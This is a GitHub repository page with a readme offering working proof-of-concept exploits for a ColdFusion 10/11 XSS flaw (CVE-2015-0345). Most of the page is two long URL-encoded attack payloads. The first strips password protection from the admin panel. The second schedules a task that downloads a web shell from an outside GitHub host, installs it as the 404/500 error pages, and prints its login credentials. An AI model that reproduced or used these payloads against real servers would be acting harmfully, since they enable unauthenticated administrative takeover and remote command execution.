Skip to content
Proof of Concept code for CVE-2015-0345 (APSB15-07)
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
coldfusion_payload_1.js Initial commit Jun 11, 2015
coldfusion_payload_1.min.js Initial commit Jun 11, 2015
coldfusion_payload_2.js Initial commit Jun 11, 2015
coldfusion_payload_2.min.js Initial commit Jun 11, 2015
readme.md Removed hardcoded IPs Jun 12, 2015

readme.md

ColdFusion 10.x 11.x XSS -> RCE PoC Exploits

This repo contains XSS vectors for CVE-2015-0345 (APSB15-07) that allow for the ability to gain remote command execution on ColdFusion installations.

This exploit is only valid for ColdFusion 10 and 11 installations. Specifically, ColdFusion 11, Update 11 and ColdFusion 10, Update 16 fixes both of these issues. More information on this disclosure can be found here.

##Payload 1

This payload disables the requirement of a password on the ColdFusion administration panel. If this payload is delivered and ran by a ColdFusion administrator, the /CFIDE/administrator directory can be accessed completely, without authentication.

http://<target>/CFIDE/administrator/filedialog/index.cfm?type=dir%27%2c%65%78%70%61%6e%64%65%64%3a%27%5c%78%32%46%27%7d%2c%66%75%6e%63%74%69%6f%6e%28%66%69%6c%65%29%7b%70%61%74%68%20%3d%20%66%69%6c%65%3b%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%74%68%62%6f%78%22%29%2e%76%61%6c%75%65%20%3d%20%70%61%74%68%3b%7d%29%3b%24%2e%67%65%74%28%20%22%2f%43%46%49%44%45%2f%61%64%6d%69%6e%69%73%74%72%61%74%6f%72%2f%73%65%63%75%72%69%74%79%2f%63%66%61%64%6d%69%6e%70%61%73%73%77%6f%72%64%2e%63%66%6d%22%2c%20%66%75%6e%63%74%69%6f%6e%28%20%64%61%74%61%20%29%20%7b%20%76%61%72%20%61%20%3d%20%22%5b%30%2d%39%41%2d%5a%5d%7b%34%30%7d%22%3b%20%76%61%72%20%74%20%3d%20%64%61%74%61%2e%6d%61%74%63%68%28%61%29%3b%20%76%61%72%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%20%78%68%72%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%68%74%74%70%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%38%35%30%30%2f%43%46%49%44%45%2f%61%64%6d%69%6e%69%73%74%72%61%74%6f%72%2f%73%65%63%75%72%69%74%79%2f%63%66%61%64%6d%69%6e%70%61%73%73%77%6f%72%64%2e%63%66%6d%22%2c%20%74%72%75%65%29%3b%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%22%41%63%63%65%70%74%22%2c%20%22%74%65%78%74%2f%68%74%6d%6c%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%68%74%6d%6c%2b%78%6d%6c%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%6d%6c%3b%71%3d%30%2e%39%2c%69%6d%61%67%65%2f%77%65%62%70%2c%2a%2f%2a%3b%71%3d%30%2e%38%22%29%3b%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%22%43%6f%6e%74%65%6e%74%2d%54%79%70%65%22%2c%20%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%22%29%3b%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%22%41%63%63%65%70%74%2d%4c%61%6e%67%75%61%67%65%22%2c%20%22%65%6e%2d%55%53%2c%65%6e%3b%71%3d%30%2e%38%22%29%3b%20%78%68%72%2e%77%69%74%68%43%72%65%64%65%6e%74%69%61%6c%73%20%3d%20%74%72%75%65%3b%20%76%61%72%20%62%6f%64%79%20%3d%20%22%61%64%6d%69%6e%73%75%62%6d%69%74%3d%53%75%62%6d%69%74%2b%43%68%61%6e%67%65%73%26%63%73%72%66%74%6f%6b%65%6e%3d%22%20%2b%20%74%20%2b%20%22%26%41%64%6d%69%6e%41%75%74%68%3d%6e%6f%6e%65%26%63%66%61%64%6d%69%6e%5f%6f%6c%64%70%61%73%73%77%6f%72%64%3d%26%63%66%61%64%6d%69%6e%5f%4e%65%77%70%61%73%73%77%6f%72%64%3d%26%63%66%61%64%6d%69%6e%5f%4e%65%77%70%61%73%73%77%6f%72%64%43%6f%6e%66%69%72%6d%3d%26%73%65%65%64%3d%26%61%6c%6c%6f%77%63%6f%6e%63%6c%6f%67%69%6e%3d%74%72%75%65%22%3b%20%76%61%72%20%61%42%6f%64%79%20%3d%20%6e%65%77%20%55%69%6e%74%38%41%72%72%61%79%28%62%6f%64%79%2e%6c%65%6e%67%74%68%29%3b%20%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%61%42%6f%64%79%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%61%42%6f%64%79%5b%69%5d%20%3d%20%62%6f%64%79%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%3b%20%78%68%72%2e%73%65%6e%64%28%6e%65%77%20%42%6c%6f%62%28%5b%61%42%6f%64%79%5d%29%29%3b%20%7d%29%3b%24%28%27%23%66%69%6c%65%54%72%65%65%44%65%6d%6f%5f%31%27%29%2e%66%69%6c%65%54%72%65%65%28%7b%73%63%72%69%70%74%3a%27%2e%2e%2f%2e%2e%2f%61%64%6d%69%6e%69%73%74%72%61%74%6f%72%2f%61%6a%61%78%74%72%65%65%2f%6a%71%75%65%72%79%46%69%6c%65%54%72%65%65%2e%63%66%6d%3f%74%79%70%65%3d%64%69%72&fromjscript=true&dialogStyle=selectDirectory&formelem=ORMSearchIndexDirectory&defaultPath=

##Payload 2

This payload attempts to upload a CFM shell to ColdFusion via the scheduling of tasks and modification of 404 and 500 error templates. If this payload delivered and ran by a ColdFusion administrator, a web-shell is then made available at /404.cfm and /500.cfm.

http://<target>/CFIDE/administrator/filedialog/index.cfm?type=dir%27%2cexpanded%3a%27%5cx2F%27%7d%2cfunction%28file%29%7bpath%20%3d%20file%3bdocument%2egetElementById%28%22pathbox%22%29%2evalue%20%3d%20path%3b%7d%29%3bfunction+getCSRFToken%28e%29%7Breturn+%24.get%28e%2Cfunction%28%29%7B%7D%29%7Dfunction+getFullPath%28%29%7Breturn+%24.get%28%22%2FCFIDE%2Fadministrator%2Fsettings%2Fmappings.cfm%22%2Cfunction%28e%29%7Bb%3D%22%2F.%2A%2FCFIDE%26nbsp%22%2Cu%3De.match%28b%29%2Cu%3Du%5B0%5D.replace%28%22%26nbsp%22%2C%22%22%29%7D%29%7Dfunction+postNewTask%28e%2Ct%2Cr%29%7Bvar+n%3D%22csrftoken%3D%22%2Bt%2B%22%26TaskName%3D%22%2Be%2B%22%26Group%3Ddefault%26Start_Date%3D03%252F30%252F2015%26End_Date%3D%26ScheduleType%3DOnce%26StartTimeOnce%3D8%253A44%2BPM%26Interval%3DDaily%26StartTimeDWM%3D%26customInterval_hour%3D0%26customInterval_min%3D0%26customInterval_sec%3D0%26CustomStartTime%3D%26CustomEndTime%3D%26repeatradio%3Drepeatforeverradio%26Repeat%3D%26crontime%3D%26Operation%3DHTTPRequest%26ScheduledURL%3Dhttps%253A%252F%252Fraw.githubusercontent.com%252FhatRiot%252Fclusterd%252Fa748bff7650c2b955fe1bb6a36db340e4ad4a213%252Fsrc%252Flib%252Fcoldfusion%252Ffuze.cfml%26Username%3D%26Password%3D%26Request_Time_out%3D%26proxy_server%3D%26http_proxy_port%3D%26proxy_user%3D%26proxy_password%3D%26publish%3D1%26publish_file%3D%22%2Br%2B%22%26publish_overwrite%3Don%26eventhandler%3D%26exclude%3D%26onmisfire%3D%26onexception%3D%26oncomplete%3D%26priority%3D5%26retrycount%3D3%26advancedmode%3Dtrue%26adminsubmit%3DSubmit%26taskNameOriginal%3D%26groupOriginal%3Ddefault%26modeOriginal%3Dserver%22%3Breturn+%24.ajax%28%7Burl%3A%22%2FCFIDE%2Fadministrator%2Fscheduler%2Fscheduleedit.cfm%22%2Ctype%3A%22POST%22%2Cdata%3An%7D%29%7Dfunction+executeTask%28e%2Ct%29%7Breturn+%24.get%28%22%2FCFIDE%2Fadministrator%2Fscheduler%2Fscheduletasks.cfm%3Fruntask%3D%22%2Be%2B%22%26group%3Ddefault%26mode%3Dserver%26csrftoken%3D%22%2Bt%2Cfunction%28%29%7B%7D%29%7Dfunction+setAsTemplate%28e%2Ct%29%7Bvar+r%3D%22csrftoken%3D%22%2Bt%2B%22%26LimitTime%3Dtrue%26MaxSeconds%3D60%26enablePerAppSettings%3D1%26uuidtoken%3D1%26enablehttpst%3D1%26WsEnable%3D1%26secureJSONPrefix%3D%252F%252F%26outputBufferMax%3D1024%26enableInMemoryFileSystem%3D1%26inMemoryFileSystemLimit%3D100%26inMemoryFileSystemApplicationLimit%3D20%26WatchInterval%3D120%26globalScriptProtect%3DFORM%252CURL%252CCOOKIE%252CCGI%26allowExtraAttributesInAttrColl%3D1%26cFaaSGeneratedFilesExpiryTime%3D30%26ORMSearchIndexDirectory%3D%26CFFORMScriptSrc%3D%252FCFIDE%252Fscripts%252F%26GoogleMapKey%3D%26serverCFC%3DServer%26compileExtForInclude%3D%2A%26applicationCFCLookup%3D1%26MissingTemplateHandler%3D%22%2BencodeURI%28e%29%2B%22%26SiteWideErrorHandler%3D%22%2BencodeURI%28e%29%2B%22%26postParametersLimit%3D100%26postSizeLimit%3D20%26throttleThreshold%3D4%26throttleMemory%3D200%26adminsubmit%3DSubmit%2BChanges%22%3Breturn+%24.ajax%28%7Burl%3A%22%2FCFIDE%2Fadministrator%2Fsettings%2Fserver_settings.cfm%22%2Ctype%3A%22POST%22%2Cdata%3Ar%7D%29%7Dtask_name%3D%22Coldfusion%2520Update%22%2C%24.when%28getCSRFToken%28%22%2FCFIDE%2Fadministrator%2Fscheduler%2Fscheduletasks.cfm%22%29%2CgetFullPath%28%29%29.done%28function%28e%2Ct%29%7Bvar+r%3De%5B2%5D.responseText%2Cn%3D%22%5B0-9A-Z%5D%7B40%7D%22%2Co%3Dr.match%28n%29%5B0%5D%3Bconsole.log%28o%29%3Bvar+a%3Dt%5B2%5D.responseText%2Ci%3D%22%2F.%2A%2FCFIDE%26nbsp%22%2Cs%3Da.match%28i%29%2Cs%3Ds%5B0%5D.replace%28%22%26nbsp%22%2C%22%22%29%3Bconsole.log%28o%2Cs%29%3Bvar+c%3Ds%2B%22%2Fupdate_cf.log%22%2Cl%3D%22%2FCFIDE%2Fupdate_cf.log%22%3B%24.when%28postNewTask%28task_name%2Co%2Cc%29%29.done%28function%28%29%7B%24.when%28executeTask%28task_name%2Co%29%29.done%28function%28%29%7B%24.when%28getCSRFToken%28%22%2FCFIDE%2Fadministrator%2Fsettings%2Fserver_settings.cfm%22%29%29.done%28function%28e%29%7Bvar+t%3De%2Cr%3D%22%5B0-9A-Z%5D%7B40%7D%22%2Cn%3Dt.match%28r%29%5B0%5D%3B%24.when%28setAsTemplate%28l%2Cn%29%29.done%28function%28%29%7Bconsole.log%28%22%25c+Shell+can+be+found+at+%22%2Bdocument.location.origin%2B%22%2F404.cfm%22%2C%22background%3A+%23D14126%3B+color%3A+white%22%29%2Cconsole.log%28%22%25c+Shell+can+be+found+at+%22%2Bdocument.location.origin%2B%22%2F500.cfm%22%2C%22background%3A+%23D14126%3B+color%3A+white%22%29%2Cconsole.log%28%22%25c+Username%3A+god%2C+Password%3A+default%22%2C%22background%3A+%23D14126%3B+color%3A+white%22%29%7D%29%7D%29%7D%29%7D%29%7D%29%3B%24%28%27%23fileTreeDemo_1%27%29%2efileTree%28%7bscript%3a%27%2e%2e%2f%2e%2e%2fadministrator%2fajaxtree%2fjqueryFileTree%2ecfm%3ftype%3ddir&fromjscript=true&dialogStyle=selectDirectory&formelem=ORMSearchIndexDirectory&defaultPath=

You can’t perform that action at this time.